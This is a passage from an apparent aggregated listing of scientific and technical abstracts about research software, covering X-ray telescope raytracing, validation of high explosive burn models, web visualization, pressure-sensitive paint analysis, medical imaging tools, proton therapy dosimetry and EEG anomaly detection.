randomly over the entrance aperture of the telescope. It has also resulted in a highly efficient system for tracing large numbers of rays. In one application to date (the analysis of VETA-I ring focus data) we have employed 2 x 107 rays, a substantial improvement over the limit of 1 x 104 rays in the original OSAC module. A second major modification is the manner in which SAOsac incorporates low spatial frequency surface errors into the geometric raytrace. The original OSAC included the ability to use Legendre-Fourier polynomials to describe deviations from the basic optical prescription. To this we have added bicubic splines to address a deficiency in the handling of the sharper deformations in the areas of mirror support pads. SAO has developed software (TRANS-FIT) to translate the most common finite element analysis models into these forms for incorporation into the raytrace program.
Systematic approach to verification and validation: High explosive burn models
DOE Office of Scientific and Technical Information (OSTI.GOV)
Menikoff, Ralph; Scovel, Christina A.
2012-04-16
Most material models used in numerical simulations are based on heuristics and empirically calibrated to experimental data. For a specific model, key questions are determining its domain of applicability and assessing its relative merits compared to other models. Answering these questions should be a part of model verification and validation (V and V). Here, we focus on V and V of high explosive models. Typically, model developers implemented their model in their own hydro code and use different sets of experiments to calibrate model parameters. Rarely can one find in the literature simulation results for different models of the samemore » experiment. Consequently, it is difficult to assess objectively the relative merits of different models. This situation results in part from the fact that experimental data is scattered through the literature (articles in journals and conference proceedings) and that the printed literature does not allow the reader to obtain data from a figure in electronic form needed to make detailed comparisons among experiments and simulations. In addition, it is very time consuming to set up and run simulations to compare different models over sufficiently many experiments to cover the range of phenomena of interest. The first difficulty could be overcome if the research community were to support an online web based database. The second difficulty can be greatly reduced by automating procedures to set up and run simulations of similar types of experiments. Moreover, automated testing would be greatly facilitated if the data files obtained from a database were in a standard format that contained key experimental parameters as meta-data in a header to the data file. To illustrate our approach to V and V, we have developed a high explosive database (HED) at LANL. It now contains a large number of shock initiation experiments. Utilizing the header information in a data file from HED, we have written scripts to generate an input file for a hydro code, run a simulation, and generate a comparison plot showing simulated and experimental velocity gauge data. These scripts are then applied to several series of experiments and to several HE burn models. The same systematic approach is applicable to other types of material models; for example, equations of state models and material strength models.« less
Vcs.js - Visualization Control System for the Web
NASA Astrophysics Data System (ADS)
Chaudhary, A.; Lipsa, D.; Doutriaux, C.; Beezley, J. D.; Williams, D. N.; Fries, S.; Harris, M. B.
2016-12-01
VCS is a general purpose visualization library, optimized for climate data, which is part of the UV-CDAT system. It provides a Python API for drawing 2D plots such as lineplots, scatter plots, Taylor diagrams, data colored by scalar values, vector glyphs, isocontours and map projections. VCS is based on the VTK library. Vcs.js is the corresponding JavaScript API, designed to be as close as possible to the original VCS Python API and to provide similar functionality for the Web. Vcs.js includes additional functionality when compared with VCS. This additional API is used to introspect data files available on the server and variables available in a data file. Vcs.js can display plots in the browser window. It always works with a server that reads a data file, extracts variables from the file and subsets the data. From this point, two alternate paths are possible. First the system can render the data on the server using VCS producing an image which is send to the browser to be displayed. This path works for for all plot types and produces a reference image identical with the images produced by VCS. This path uses the VTK-Web library. As an optimization, usable in certain conditions, a second path is possible. Data is packed, and sent to the browser which uses a JavaScript plotting library, such as plotly, to display the data. Plots that work well in the browser are line-plots, scatter-plots for any data and many other plot types for small data and supported grid types. As web technology matures, more plots could be supported for rendering in the browser. Rendering can be done either on the client or on the server and we expect that the best place to render will change depending on the available web technology, data transfer costs, server management costs and value provided to users. We intend to provide a flexible solution that allows for both client and server side rendering and a meaningful way to choose between the two. We provide a web-based user interface called vCdat which uses Vcs.js as its visualization library. Our paper will discuss the principles guiding our design choices for Vcs.js, present our design in detail and show a sample usage of the library.
Legato: Personal Computer Software for Analyzing Pressure-Sensitive Paint Data
NASA Technical Reports Server (NTRS)
Schairer, Edward T.
2001-01-01
'Legato' is personal computer software for analyzing radiometric pressure-sensitive paint (PSP) data. The software is written in the C programming language and executes under Windows 95/98/NT operating systems. It includes all operations normally required to convert pressure-paint image intensities to normalized pressure distributions mapped to physical coordinates of the test article. The program can analyze data from both single- and bi-luminophore paints and provides for both in situ and a priori paint calibration. In addition, there are functions for determining paint calibration coefficients from calibration-chamber data. The software is designed as a self-contained, interactive research tool that requires as input only the bare minimum of information needed to accomplish each function, e.g., images, model geometry, and paint calibration coefficients (for a priori calibration) or pressure-tap data (for in situ calibration). The program includes functions that can be used to generate needed model geometry files for simple model geometries (e.g., airfoils, trapezoidal wings, rotor blades) based on the model planform and airfoil section. All data files except images are in ASCII format and thus are easily created, read, and edited. The program does not use database files. This simplifies setup but makes the program inappropriate for analyzing massive amounts of data from production wind tunnels. Program output consists of Cartesian plots, false-colored real and virtual images, pressure distributions mapped to the surface of the model, assorted ASCII data files, and a text file of tabulated results. Graphical output is displayed on the computer screen and can be saved as publication-quality (PostScript) files.
PDBsum: Structural summaries of PDB entries.
Laskowski, Roman A; Jabłońska, Jagoda; Pravda, Lukáš; Vařeková, Radka Svobodová; Thornton, Janet M
2018-01-01
PDBsum is a web server providing structural information on the entries in the Protein Data Bank (PDB). The analyses are primarily image-based and include protein secondary structure, protein-ligand and protein-DNA interactions, PROCHECK analyses of structural quality, and many others. The 3D structures can be viewed interactively in RasMol, PyMOL, and a JavaScript viewer called 3Dmol.js. Users can upload their own PDB files and obtain a set of password-protected PDBsum analyses for each. The server is freely accessible to all at: http://www.ebi.ac.uk/pdbsum. © 2017 The Protein Society.
Hardware independence checkout software
NASA Technical Reports Server (NTRS)
Cameron, Barry W.; Helbig, H. R.
1990-01-01
ACSI has developed a program utilizing CLIPS to assess compliance with various programming standards. Essentially the program parses C code to extract the names of all function calls. These are asserted as CLIPS facts which also include information about line numbers, source file names, and called functions. Rules have been devised to establish functions called that have not been defined in any of the source parsed. These are compared against lists of standards (represented as facts) using rules that check intersections and/or unions of these. By piping the output into other processes the source is appropriately commented by generating and executing parsed scripts.
A Platform-Independent Plugin for Navigating Online Radiology Cases.
Balkman, Jason D; Awan, Omer A
2016-06-01
Software methods that enable navigation of radiology cases on various digital platforms differ between handheld devices and desktop computers. This has resulted in poor compatibility of online radiology teaching files across mobile smartphones, tablets, and desktop computers. A standardized, platform-independent, or "agnostic" approach for presenting online radiology content was produced in this work by leveraging modern hypertext markup language (HTML) and JavaScript web software technology. We describe the design and evaluation of this software, demonstrate its use across multiple viewing platforms, and make it publicly available as a model for future development efforts.
NASA Astrophysics Data System (ADS)
Ma, Kevin; Wong, Jonathan; Zhong, Mark; Zhang, Jeff; Liu, Brent
2014-03-01
In the past, we have presented an imaging-informatics based eFolder system for managing and analyzing imaging and lesion data of multiple sclerosis (MS) patients, which allows for data storage, data analysis, and data mining in clinical and research settings. The system integrates the patient's clinical data with imaging studies and a computer-aided detection (CAD) algorithm for quantifying MS lesion volume, lesion contour, locations, and sizes in brain MRI studies. For compliance with IHE integration protocols, long-term storage in PACS, and data query and display in a DICOM compliant clinical setting, CAD results need to be converted into DICOM-Structured Report (SR) format. Open-source dcmtk and customized XML templates are used to convert quantitative MS CAD results from MATLAB to DICOM-SR format. A web-based GUI based on our existing web-accessible DICOM object (WADO) image viewer has been designed to display the CAD results from generated SR files. The GUI is able to parse DICOM-SR files and extract SR document data, then display lesion volume, location, and brain matter volume along with the referenced DICOM imaging study. In addition, the GUI supports lesion contour overlay, which matches a detected MS lesion with its corresponding DICOM-SR data when a user selects either the lesion or the data. The methodology of converting CAD data in native MATLAB format to DICOM-SR and displaying the tabulated DICOM-SR along with the patient's clinical information, and relevant study images in the GUI will be demonstrated. The developed SR conversion model and GUI support aim to further demonstrate how to incorporate CAD post-processing components in a PACS and imaging informatics-based environment.
Dosimetric investigation of proton therapy on CT-based patient data using Monte Carlo simulation
NASA Astrophysics Data System (ADS)
Chongsan, T.; Liamsuwan, T.; Tangboonduangjit, P.
2016-03-01
The aim of radiotherapy is to deliver high radiation dose to the tumor with low radiation dose to healthy tissues. Protons have Bragg peaks that give high radiation dose to the tumor but low exit dose or dose tail. Therefore, proton therapy is promising for treating deep- seated tumors and tumors locating close to organs at risk. Moreover, the physical characteristic of protons is suitable for treating cancer in pediatric patients. This work developed a computational platform for calculating proton dose distribution using the Monte Carlo (MC) technique and patient's anatomical data. The studied case is a pediatric patient with a primary brain tumor. PHITS will be used for MC simulation. Therefore, patient-specific CT-DICOM files were converted to the PHITS input. A MATLAB optimization program was developed to create a beam delivery control file for this study. The optimization program requires the proton beam data. All these data were calculated in this work using analytical formulas and the calculation accuracy was tested, before the beam delivery control file is used for MC simulation. This study will be useful for researchers aiming to investigate proton dose distribution in patients but do not have access to proton therapy machines.
EEGgui: a program used to detect electroencephalogram anomalies after traumatic brain injury.
Sick, Justin; Bray, Eric; Bregy, Amade; Dietrich, W Dalton; Bramlett, Helen M; Sick, Thomas
2013-05-21
Identifying and quantifying pathological changes in brain electrical activity is important for investigations of brain injury and neurological disease. An example is the development of epilepsy, a secondary consequence of traumatic brain injury. While certain epileptiform events can be identified visually from electroencephalographic (EEG) or electrocorticographic (ECoG) records, quantification of these pathological events has proved to be more difficult. In this study we developed MATLAB-based software that would assist detection of pathological brain electrical activity following traumatic brain injury (TBI) and present our MATLAB code used for the analysis of the ECoG. Software was developed using MATLAB(™) and features of the open access EEGLAB. EEGgui is a graphical user interface in the MATLAB programming platform that allows scientists who are not proficient in computer programming to perform a number of elaborate analyses on ECoG signals. The different analyses include Power Spectral Density (PSD), Short Time Fourier analysis and Spectral Entropy (SE). ECoG records used for demonstration of this software were derived from rats that had undergone traumatic brain injury one year earlier. The software provided in this report provides a graphical user interface for displaying ECoG activity and calculating normalized power density using fast fourier transform of the major brain wave frequencies (Delta, Theta, Alpha, Beta1, Beta2 and Gamma). The software further detects events in which power density for these frequency bands exceeds normal ECoG by more than 4 standard deviations. We found that epileptic events could be identified and distinguished from a variety of ECoG phenomena associated with normal changes in behavior. We further found that analysis of spectral entropy was less effective in distinguishing epileptic from normal changes in ECoG activity. The software presented here was a successful modification of EEGLAB in the Matlab environment that allows detection of epileptiform ECoG signals in animals after TBI. The code allows import of large EEG or ECoG data records as standard text files and uses fast fourier transform as a basis for detection of abnormal events. The software can also be used to monitor injury-induced changes in spectral entropy if required. We hope that the software will be useful for other investigators in the field of traumatic brain injury and will stimulate future advances of quantitative analysis of brain electrical activity after neurological injury or disease.